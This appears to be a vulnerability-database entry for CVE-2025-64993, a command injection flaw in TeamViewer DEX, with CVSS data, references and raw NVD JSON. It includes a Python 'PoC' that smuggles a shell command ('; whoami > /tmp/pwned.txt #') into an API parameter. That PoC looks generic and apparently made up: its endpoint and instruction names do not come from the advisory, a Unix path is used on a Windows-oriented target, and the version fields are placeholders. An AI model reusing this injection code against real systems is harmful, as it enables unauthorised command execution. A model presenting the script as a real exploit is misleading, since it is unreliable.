CVE-2025-64993

Description

A command injection vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-ConfigMgrConsoleExtensions instructions. Improper input validation, allowing authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform.

CVSS Details

CVSS Score

6.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:teamviewer:digital_employee_experience:*:*:*:*:*:*:*:* - VULNERABLE

TeamViewer DEX (1E DEX) < 修复版本

1E-ConfigMgrConsoleExtensions < 安全补丁版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-64993 PoC - TeamViewer DEX Command Injection
# Requires: Valid credentials with Actioner privileges

import requests
import json

TARGET_URL = "https://vulnerable-server/1E-ConfigMgrConsoleExtensions/api"
SESSION_COOKIE = "your_session_cookie_here"

def exploit_command_injection():
    """
    Demonstrates command injection in 1E-ConfigMgrConsoleExtensions
    This PoC shows how to inject arbitrary commands through improper input validation
    """
    headers = {
        'Cookie': f'session={SESSION_COOKIE}',
        'Content-Type': 'application/json',
        'Authorization': 'Bearer your_token_here'
    }
    
    # Malicious payload exploiting command injection
    # The vulnerable endpoint does not properly sanitize input
    malicious_command = "; whoami > /tmp/pwned.txt #"
    
    payload = {
        "instruction": "ExecuteSystemCommand",
        "targetDevice": "WORKSTATION-01",
        "parameters": {
            "command": f"legitimate_command{malicious_command}",
            "timeout": 30
        }
    }
    
    try:
        response = requests.post(TARGET_URL, json=payload, headers=headers, verify=False, timeout=10)
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")
        
        if response.status_code == 200:
            print("[+] Command injection successful - check /tmp/pwned.txt on target")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

def verify_vulnerability():
    """
    Verify if the target is vulnerable by checking for known indicators
    """
    # Check for CVE-2025-64993 in TeamViewer DEX versions
    check_url = f"{TARGET_URL}/version"
    
    try:
        response = requests.get(check_url, headers={'Cookie': f'session={SESSION_COOKIE}'}, verify=False)
        version_info = response.json()
        print(f"[*] Target version: {version_info.get('version', 'Unknown')}")
        
    except Exception as e:
        print(f"[-] Version check failed: {e}")

if __name__ == "__main__":
    print("CVE-2025-64993 PoC - TeamViewer DEX Command Injection")
    print("=" * 60)
    verify_vulnerability()
    exploit_command_injection()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64993
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64993
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64993/
[4] VulDB https://vuldb.com/cve/CVE-2025-64993
[5] https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64993", "sourceIdentifier": "[email protected]", "published": "2025-12-11T12:16:26.320", "lastModified": "2026-01-09T02:06:24.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-ConfigMgrConsoleExtensions instructions. Improper input validation, allowing authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:teamviewer:digital_employee_experience:*:*:*:*:*:*:*:*", "versionEndExcluding": "29.0", "matchCriteriaId": "3E15BFE6-D57C-4F21-8284-68ABE840512C"}]}]}], "references": [{"url": "https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}